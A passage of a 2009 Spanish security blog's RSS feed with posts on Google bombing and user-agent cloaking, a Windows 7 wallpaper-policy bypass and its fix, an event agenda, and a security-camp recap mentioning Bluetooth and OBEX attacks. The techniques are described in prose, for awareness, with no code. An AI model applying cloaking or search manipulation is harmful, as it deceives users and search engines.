un término apareciera una página en la que no se encuentra, por ningún sitio, el término buscado. Un ejemplo clásico de esto es el de la palabra &lt;em&gt;“ladrones”&lt;/em&gt; que fue usado masivamente para enlazar la web de la SGAE.&lt;br /&gt;&lt;br /&gt;A conseguir este objetivo, es decir, asociar una palabra que no tenía nada que ver con el destino de forma &lt;em&gt;"fraudulenta"&lt;/em&gt; se conoce como &lt;a href="http://es.wikipedia.org/wiki/Google_bomb"&gt;Google Bombing&lt;/a&gt;. Esto se utilizó con muchos políticos en España para asociarles términos como indeseable, asesino, etc...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://googlewebmastercentral.blogspot.com/2007/01/quick-word-about-googlebombs.html"&gt;Google decidió cambiar la forma en que funcionaba el algoritmo de relevancia para detectar estas bombas &lt;/a&gt;en el año 2007 aunque la importancia de los términos siguió siendo importante, y, por supuesto la relevancia de la web se sigue midiendo en enlaces de entrada. Para detectar bombas lo que intenta el algoritmo de Google es averiguar cuando el término y la página destino realmente no tienen nada que ver. Pero hecha la ley hecha la trampa. ¿Qué tal apuntar a un link de la SGAE con la palabra ladrones a pesar de que éste no sea un valor correcto? &lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SudrQEtbjuI/AAAAAAAAFZ8/l2W9bQzQAag/s1600-h/Figura1.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 207px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SudrQEtbjuI/AAAAAAAAFZ8/l2W9bQzQAag/s400/Figura1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397400602313199330" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 1: De 3.350.000 páginas con información sobre el término ladrones, la SGAE es la primera.&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Algunas grandes empresas han utilizado sistemas tramposos similares para conseguir subir la relevancia de campañas de promoción. Un ejemplo de esto el caso de BMW Alemania. Esta web comprobaba el valor del campo user-agent del cliente que realizaba la petición y, si era el robot de Google, le entregaba una página totalmente distinta a la que podía ver un usuario. Esto le permitía a la página ofrecer una página mucho más enfocada a la indexación y que realmente correspondía con todos los links que había comprado, pero sin embargo, la página de verdad que vería un usuario no era tan relevante como la que veía el indexador. &lt;a href="http://www.mattcutts.com/blog/ramping-up-on-international-webspam/"&gt;Google detectó este comportamiento y eliminó esta página de la base de datos del buscador&lt;/a&gt; hasta que no cambiara su comportamiento.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SudrP9MuGCI/AAAAAAAAFZ0/SMLCtEqj4rE/s1600-h/Figura2.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 381px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SudrP9MuGCI/AAAAAAAAFZ0/SMLCtEqj4rE/s400/Figura2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397400600296953890" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 2: Página que veía el agente de google&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SudrPkiB7kI/AAAAAAAAFZs/SdGNf27zDmE/s1600-h/Figura3.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 329px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SudrPkiB7kI/AAAAAAAAFZs/SdGNf27zDmE/s400/Figura3.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397400593675447874" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 3: Página que veían los navegantes&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Este truco de utilizar páginas distintas para el navegador y para el usuario había sido muy utilizado por los pobres diseñadores Flash, que tanto les costaba que el contenido de sus swf generara relevancia en las búsquedas.&lt;br /&gt;&lt;br /&gt;**********************************************************************************************&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/seo-para-gente-de-moral-relajada-i-de.html"&gt;Técnicas SEO para gente de moral relajada [I de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [II de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [III de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral_09.html"&gt;Técnicas SEO para gente de moral relajada [IV de VI]&lt;/a&gt;&lt;br /&gt;- Técnicas SEO para gente de moral relajada [V de VI]&lt;br /&gt;- Técnicas SEO para gente de moral relajada [VI de VI]&lt;br /&gt;&lt;em&gt;Autores: Chema Alonso &amp; Enrique Rando&lt;/em&gt;&lt;br /&gt;**********************************************************************************************&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-4823192869493077370?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/P7BvQXQBUbU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/P7BvQXQBUbU/seo-para-gente-de-moral-relajada-i-de.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SudrQEtbjuI/AAAAAAAAFZ8/l2W9bQzQAag/s72-c/Figura1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">18</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/10/seo-para-gente-de-moral-relajada-i-de.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-3297315577699128528</guid><pubDate>Mon, 26 Oct 2009 23:01:00 +0000</pubDate><atom:updated>2009-10-26T23:30:30.741+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Curiosidades</category><category domain="http://www.blogger.com/atom/ns#">Windows 7</category><title>Ataque de David Hasselhoff mejorado</title><description>&lt;div align="justify"&gt;En i64, desde que &lt;em&gt;"cierto sevillano pelirojo pisó el SOCtano"&lt;/em&gt;, se instauró la moda del &lt;a href="http://windowstips.wordpress.com/2008/06/08/el-caso-del-hacker-de-la-oficina/"&gt;ataque de David Hasselfoff&lt;/a&gt;. La idea es tan sencilla como recordar a los compañeros que no debe dejarse el equipo con la sesión abierta cuando se abandona el puesto de trabajo.&lt;br /&gt;&lt;br /&gt;Algunos lo aprendemos antes que otros. Son estos últimos los que acaban blasfeamando, cabreándose consigo mismo o buscando nuevas vendettas. Y es de uno de estos últimos de lo que va esta historia y descubrimiento.&lt;br /&gt;&lt;br /&gt;El susodicho ser víctima, llamémosle &lt;em&gt;"señor M"&lt;/em&gt;, decidió que no le volvería a pasar nunca más el escarnio del ataque, así que, para dar por culo al resto de compañeros estableció una política local en Windows 7 en la que dejaba configurada la imagen de fondo de escritorio que le gustaba además de otra política para que no se pudieran hacer cambios en él. &lt;br /&gt;&lt;br /&gt;Como reconstrucción de los hechos yo he establecido una foto del sistema de aviso de tiempos utilizado en la ekoparty como fondo de pantalla. Como se puede ver en la siguiente secuencia.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SuYXZHCQRyI/AAAAAAAAFZk/yBoM1tmrT68/s1600-h/01.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 253px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SuYXZHCQRyI/AAAAAAAAFZk/yBoM1tmrT68/s400/01.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397026923602790178" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 1: Estabalecimiento de políticas&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/SuYRMzvGVII/AAAAAAAAFY8/0IFQ9HmV3zM/s1600-h/02.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 225px;" src="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/SuYRMzvGVII/AAAAAAAAFY8/0IFQ9HmV3zM/s400/02.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397020115193975938" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 2: Fondo de pantalla establecido&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Este valor de fondo de escritorio no puede ser cambiado entrando en la configuración de la pantalla, ya que la política lo prohibe. Tampoco se puede cambiar si se utiliza la opción que se ofrece al pulsar sobre la imagen guardada de nuestro querido sex symbol, tal y como se ve en la figura 3.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/SuYRMiCjDvI/AAAAAAAAFY0/wuxi98HaMq8/s1600-h/03.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 143px;" src="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/SuYRMiCjDvI/AAAAAAAAFY0/wuxi98HaMq8/s400/03.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397020110443712242" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 3: Intento fallido de cambiar el fondo de escritorio desde el explorador de archivos&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Todo parecía bien seguro para el &lt;em&gt;"señor M"&lt;/em&gt; y se relajó. Abandonó su puesto de trabajo temporalmente y se olvidó, una vez más, de cerrar su sesión. El &lt;em&gt;"señor Z"&lt;/em&gt;, al acecho, y pendenciero, desde su puesto de mando privilegiado, vio a la gacela herida sobre la mesa y no se lo pensó dos veces. Salto sobre ella, navegó por Internet buscando la tan amada instantanea de nuestro David y, desde el propio navegador, utilizo la misma opción: &lt;em&gt;Establecer como fondo de escritorio&lt;/em&gt;.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SuYRMbID8ZI/AAAAAAAAFYs/ckWlNCxT0dg/s1600-h/04.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 214px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SuYRMbID8ZI/AAAAAAAAFYs/ckWlNCxT0dg/s400/04.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397020108587790738" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 4: Opción de establecer como fondo de escritorio desde el navegador&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Cuál sería la sorpresa del &lt;em&gt;señor...M&lt;/em&gt;, cuando al llegar a su ordenador el fondo de escritorio lucía como se puede apreciar en la siguiente imagen:&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SuYRMANTerI/AAAAAAAAFYk/UVQzmkUI7iE/s1600-h/05.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 225px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SuYRMANTerI/AAAAAAAAFYk/UVQzmkUI7iE/s400/05.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397020101362023090" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 5: PWNED&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Vaya por delante que la política está bien configurada y que la configuración de UAC está al máximo nivel de protección, es decir, que avisa siempre que se utilizan los privilegios de administración en el sistema.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;¿Qué ha pasado entonces? &lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Pues que esa política a niel de usuario es una desactivación de funciones y parece que a alguien se le ha olvidado desactivar esta función en concreto con esta política. La realidad es que hay ciertas políticas en los sitemas Windows que se parecen mucho por herencia con el pasado. El problema de una política antigua es que tal vez no funciona correctamente en una versión más moderna y es por ello por lo que se crea una nueva versión de la política que matiza o fortifica la antigüa. &lt;br /&gt;&lt;br /&gt;En este problema del escritorio la solución es tan fácil como aplicar la política correcta, es decir, la de impedir cambios del fondo de escritorio en la política del panel de control.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SuYWrFbcRVI/AAAAAAAAFZU/suEMLUo6IHA/s1600-h/06.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 257px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SuYWrFbcRVI/AAAAAAAAFZU/suEMLUo6IHA/s400/06.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397026132897580370" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 6: Directiva de bloqueo de panel&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;El resultado es que, tras el forzado de la recarga de la política, la opción queda deshabilitada de todas partes, incluido el menú contextual de imágenes vistas a través del navegador.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SuYWq0N5oRI/AAAAAAAAFZM/-vLIscJktw0/s1600-h/07.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 174px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SuYWq0N5oRI/AAAAAAAAFZM/-vLIscJktw0/s400/07.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397026128277381394" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 7: Desactivado&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Conclusión: Antes de aplicar una política asegúrate de que hace lo que esperas que haga y, por encima de todo, no dejes la sesión abierta de tu ordenador.&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-3297315577699128528?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/nuIkUpbpShw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/nuIkUpbpShw/ataque-de-david-hasselhoff-mejorado.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SuYXZHCQRyI/AAAAAAAAFZk/yBoM1tmrT68/s72-c/01.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">11</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/10/ataque-de-david-hasselhoff-mejorado.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-4471954464435036637</guid><pubDate>Mon, 26 Oct 2009 13:30:00 +0000</pubDate><atom:updated>2009-10-26T14:43:29.997+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Eventos</category><title>Cosas para esta semana</title><description>&lt;div align="justify"&gt;Para los aburridos, os dejo aquí la lista de seminarios que van a tener lugar esta semana. Como se puede ver hay muchas cosas en &lt;u&gt;Bilbao&lt;/u&gt;, con la llegada del &lt;u&gt;Innovation Tour&lt;/u&gt;, el &lt;u&gt;Design Tour&lt;/u&gt; y los &lt;u&gt;Hands On lab&lt;/u&gt; con su última semana. Aparte de Bilbao, yo iré con el Innovation Tour a &lt;u&gt;Valladolid&lt;/u&gt; y los compis seguirán luchando para cerrar esta quinta temporada de Hands On Lab en &lt;u&gt;Madrid&lt;/u&gt; con una semana dedicada sólo a productos de seguridad.&lt;br /&gt;&lt;br /&gt;El viernes, yo daré una clase en el &lt;a href="http://www.informatica64.com/ftsai.aspx"&gt;FTSAI V&lt;/a&gt; para los que estéis apuntados y Carles Martín de Quest Software, aprovechará para dar un &lt;u&gt;seminario a través de Internet, sobre Exchange Server 2010&lt;/u&gt;. &lt;br /&gt;&lt;br /&gt;Por último, si estás en paro o en situación de mejora de empleo, pudes hacer aun pruebas para los &lt;u&gt;nuevos cursos de Antihacking&lt;/u&gt; que tendrán lugar en Getafe del 16 de Noviembre al 15 de Diciembre. A razón de 5 horas cada día en horario de mañana o de tarde. Para hacer dicha prueba tendrás que pasar el miercoles que viene a las 10:00 de la mañana o a las 17:00 de la tarde por el &lt;em&gt;“Centro de Formación en Tecnologías de la Información y las Comunicaciones - Madrid Sur”&lt;/em&gt; del Servicio Regional de Empleo de la Comunidad de Madrid que está sito en la Avenida Arcas del Agua s/n, CP: 28905, Getafe (Madrid), metro Conservatorio. El curso lo vamos a impartir desde Informática64.&lt;br /&gt;&lt;br /&gt;Agenda&lt;br /&gt;&lt;br /&gt;27 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-FOR05 MS Forefront TMG: Instalación y Configuración&lt;/a&gt;&lt;br /&gt;27 [Bilbao] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-SQL29 MS SQL Server 2008. Gestión de Base de Datos &lt;/a&gt; &lt;br /&gt;27 [Bilbao] &lt;a href="http://elladodelmal.blogspot.com/2009/08/innovation-tour-2009.html"&gt;Innovation Tour&lt;/a&gt;&lt;br /&gt;27 [Bilbao] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-SPS04 MS Windows Sharepoint Services V3&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;28 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-FOR06 MS Forefront TMG: Protección de Amenazas&lt;/a&gt;&lt;br /&gt;28 [Madrid[ &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-ISA24 MS Intelligent Application Gateway 2007&lt;/a&gt;&lt;br /&gt;28 [Bilbao] &lt;a href="http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032425978&amp;culture=es-ES"&gt;Desing Tour&lt;/a&gt;&lt;br /&gt;28 [Bilbao] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-SPS09 MOSS 2007. Arquitectura de Portales &lt;/a&gt;&lt;br /&gt;28 [Biblao] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-SQL30 MS SQL Server 2008. Entorno de Desarrollo&lt;/a&gt;&lt;br /&gt;28 [Getafe] &lt;strong&gt;&lt;em&gt;Prueba de Curso Antihacking&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;29 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-FOR07 MS ForeFront TMG: VPN y Branch Office&lt;/a&gt; &lt;br /&gt;29 [Bilbao] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-SPS08 MOSS 2007. Gestión empresarial&lt;/a&gt;&lt;br /&gt;29 [Valladolid] &lt;a href="http://elladodelmal.blogspot.com/2009/08/innovation-tour-2009.html"&gt;Innovation Tour&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;30 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-FOR08 MS Forefront Stirling&lt;/a&gt; &lt;br /&gt;30 [Bilbao] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-SPS10 MOSS 2007. Entornos Colaborativos&lt;/a&gt; &lt;br /&gt;30 [Webcast] &lt;a href="http://questsoftware.wordpress.com/2009/10/25/webseminar-preprate-para-exchange-2010-con-quest-software/"&gt; MS Exchange Server 2010&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-4471954464435036637?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/RSG_SfYyY6I" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/RSG_SfYyY6I/cosas-para-esta-semana.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/10/cosas-para-esta-semana.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-7970045019015012693</guid><pubDate>Mon, 26 Oct 2009 07:25:00 +0000</pubDate><atom:updated>2009-10-26T08:32:36.677+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Eventos</category><title>Las crónicas de la campinglance</title><description>&lt;div align="justify"&gt;El fin de semana del Asegúr@IT Camp ha transcurrido según estaba previsto lo cual es algo a tener muy en cuenta cuando se junta un montón de gente de un montón de sitios durante un fin de semana fuera de su ambiente habitual y los pones a estudiar.&lt;br /&gt; &lt;br /&gt;En el Asegúr@IT Camp hemos asistido 52 personas, exactamente el número de plazas que se habían reservado para las cabañas, con lo que me arrepiento de no haber jugado alguna lotería de esas de acertar números. Entre el grupo de asistentes, de nuevo, gente de todas partes, desde Sevilla, A Coruña, León, Bilbao, Valladolid, Vitoria, Barcelona, Burgos, Frankfurt, Madrid, etc… ha venido algún destacamento. Un montón de gente que se ha venido a pasar un fin de semana al monte y que el monte ha decidido agradecérselo con un tiempo increíblemente bueno.&lt;br /&gt;&lt;br /&gt;Las cabañas que nos esperaban allí estaban geniales, con dos habitaciones con dos camas cada una con sus mantas, sábanas y toallas, cocina con neverita, platos, vasos y demás neceseres, salón con su tele de 14 pulgaditas, cuarto de baño, etc… vamos, que nos hemos ido de Camping, pero como se van los que ya tenemos una edad.&lt;br /&gt;&lt;br /&gt;El viernes fuimos llegando de diferentes lugares y a diferentes horas el grueso del pelotón. Las chicas de &lt;a href="http://www.eventos-creativos.com/"&gt;Eventos Creativos&lt;/a&gt; nos fueron cuidando y dirigiendo a nuestros niditos para que dejáramos las cosas y pudiéramos ir a juntarnos todos y tomar cervezas en la cafetería hasta la hora de la cena, que fue a las 22:00. La cena, sorprendentemente, estuvo buena y ya pudimos envinarnos un rato para empalmar con la sesión de chistes trianeros en la caballa de I64 donde comenzó la debacle de algunos que decidieron tomar botellón con Whiski marca &lt;strong&gt;&lt;em&gt;SG&lt;/em&gt;&lt;/strong&gt; y Cola marca &lt;strong&gt;&lt;em&gt;Autentica&lt;/em&gt;&lt;/strong&gt;.&lt;br /&gt;&lt;br /&gt;La noche fue más dura para algunos que para otros, pero al día siguiente estaban todos, bueno, todos no, un irreductible miembro de un pueblo trianero y un catalán que decía cosas como &lt;em&gt;“eres un fuquin crá”&lt;/em&gt;, fueron los únicos que no estuvieron en el desayuno y a primera hora en las charlas. El resto, estuvimos ahí como clavos.&lt;br /&gt;&lt;br /&gt;La jornada comenzó con&lt;strong&gt;&lt;em&gt; Carles Martín &lt;/em&gt;&lt;/strong&gt;de Quest Software y su charla de interconectar equipos Mac OS y Linux al directorio activo. Para la charla Carles me trajo un bonito disfraz de Yoda que, siendo uno tan fan como es de Star Wars, no pude evitar ponerme. Carles regaló un i-Pod nano y una camiseta y la charla estuvo en su línea: perfecta.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Alberto Moreno &lt;em&gt;“Gospel”&lt;/em&gt;&lt;/em&gt;&lt;/strong&gt;, dio la charla después, con sus ene portátiles, móviles, microportátiles, etc.. para enseñarnos algunos ataques chulos de MIT (Mobile in The Middle) o como capturar las claves de asociación de dispositivos mediante Bluetooth, crackearla y suplantar a un dispositivo autorizado, como realizar un ataque de path transversal al servicio OBEX Ftp, etc… la charla fue muy buena, a pesar de que al principio una demo le dio guerra. Llevo tiempo viendo la charla de seguridad en móvil de Gospel, pero cada vez que la repite es más chula. Me alegra llevar el BT desconectado de mi móvil.&lt;br /&gt;&lt;br /&gt;Conseguimos después que viniera el irreductible trianero a dar la charla de análisis de tramas de red. &lt;strong&gt;&lt;em&gt;Juan Garrido “silverhack”&lt;/em&gt;&lt;/strong&gt; nos hizo alguna demostración de analizar el protocolo del Messenger para reconstruir conversaciones, ficheros transmitidos e incluso video, en este caso con &lt;a href="http://rbytes.org/descargar/authors/ramiro-polla/"&gt;las herramientas de Ramiro Polla&lt;/a&gt;. Muy buena charla del contador de chistes más rápido del camping.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;David Cervigón&lt;/em&gt;&lt;/strong&gt; vino para terminar la mañana a hablar de virtualización y enseñarnos como va  todo esto, desde la creación del almacenamiento donde se guardan las máquinas virtuales, hasta el nuevo Office en la nube. La charla fue de abajo, el hierro, hasta arriba, las blanditas nubes y la gente se lo pasó, al menos  tan bien como el Cervi cuando lo cuenta, porque se le ve disfrutar con esas cosas.&lt;br /&gt;&lt;br /&gt;Comida de espaguetis a la boloñesa y pollo asado para retomar fuerzas y vuelta al lio con la FOCA RC2 y las nuevas opciones de la misma impartida por &lt;strong&gt;&lt;em&gt;Alejandro Martín Bailón&lt;/em&gt;&lt;/strong&gt; y el mismísimo señor &lt;strong&gt;&lt;em&gt;Francisco Oca&lt;/em&gt;&lt;/strong&gt; que se subió a hacer las demos. Una charla rapidita de la que salió algún nuevo fan de la FOCA que no la había probado nunca.&lt;br /&gt;&lt;br /&gt;De nuevo otra charla rapidita, esta vez de &lt;strong&gt;&lt;em&gt;David Carrasco&lt;/em&gt;&lt;/strong&gt;, nuestro amigo de Héroes Certificados, sobre DNSSec, con su gracia habitual. David conto las bonanzas y las carencias de usar DNSSec y cómo montarlo para configurar un servidor DNS que firmara las respuestas ofrecidas a las consultas. &lt;br /&gt;&lt;br /&gt;De esa charlita pasamos a &lt;strong&gt;&lt;em&gt;Alejandro Ramos&lt;/em&gt;&lt;/strong&gt;, que impartió una las charlas que a mí más me gustan. Las de cotilleos. Yo soy una portera y Dab se conoce muchas de las historias que han pasado en la comunidad hacker. Le encanta conocer el qué y el cómo de las cosas que han pasado, así que nos empezó a sorprender con las aventuras de defaces a sitios famosos, vendettas, fails épicos, etc…&lt;br /&gt;&lt;br /&gt;Y para cambiar el tercio, Nico, que apareció a la hora del vermú nos contó un poco la historia de Nicodemo animation para subsistir en este mundo de animación por ordenador en Flash y el mundo de la publicidad. Sus inicios con los linking days de el corte inglés de donde salieron los nombres de los niños mutantes de San Ildefonso, su &lt;a href="http://elladodelmal.blogspot.com/2009/10/asegurit-camp-doctor-birufilla.html"&gt;Doctor Birufilla &lt;/a&gt;y los Sabías lo Qué de El País, El episodio continuación del famoso &lt;em&gt;“Historia de Amor”&lt;/em&gt; de Cálico electrónico que viene como extra en el DVD de la tercera temporada, etc.. &lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Dlvy6mNQjxI&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Dlvy6mNQjxI&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;em&gt;Cálico Electrónico: Hasta los Clones&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Éste episodio me encantó, con sus &lt;em&gt;“homenajes”&lt;/em&gt; a Blade Runner, los Gremlyms, el mundo del hip hop y demás, es tronchante. Hubo ciertos problemas de audio que me sacaron de quicio porque no me permitían apreciar todos los chistes, pero aproveché después para buscarlos todos por Internet.&lt;br /&gt;&lt;br /&gt;Y la última charla fue a cargo de &lt;strong&gt;&lt;em&gt;Ricardo Varela&lt;/em&gt;&lt;/strong&gt;, el “chico maravillas”, como Francisco Camping y mía, como el señor Cinturón, para buscar nuevas formas de posicionar nuestro negocio:&lt;br /&gt;&lt;br /&gt;&lt;em&gt;- “Tengo un negocio de la polla”&lt;br /&gt;- “Ah, muy bien, ¿y cuál es el negocio?”&lt;br /&gt;- “¿Pues no se lo he dicho? La polla.&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;De ahí a la cena, la sobremesa, las copas, el combate del furgolín en la disco del camping, la resaca, el desayuno, las fotos de despedida, el siempre nos querremos y el … &lt;em&gt;“Nos vemos el año que viene que abren el Spá en el camping”&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;Un buen fin de semana del que me llevo grandes momentos y una gripe de caballo que me ha dejado baldado y con las amígdalas inflamadas metido en la camita.&lt;br 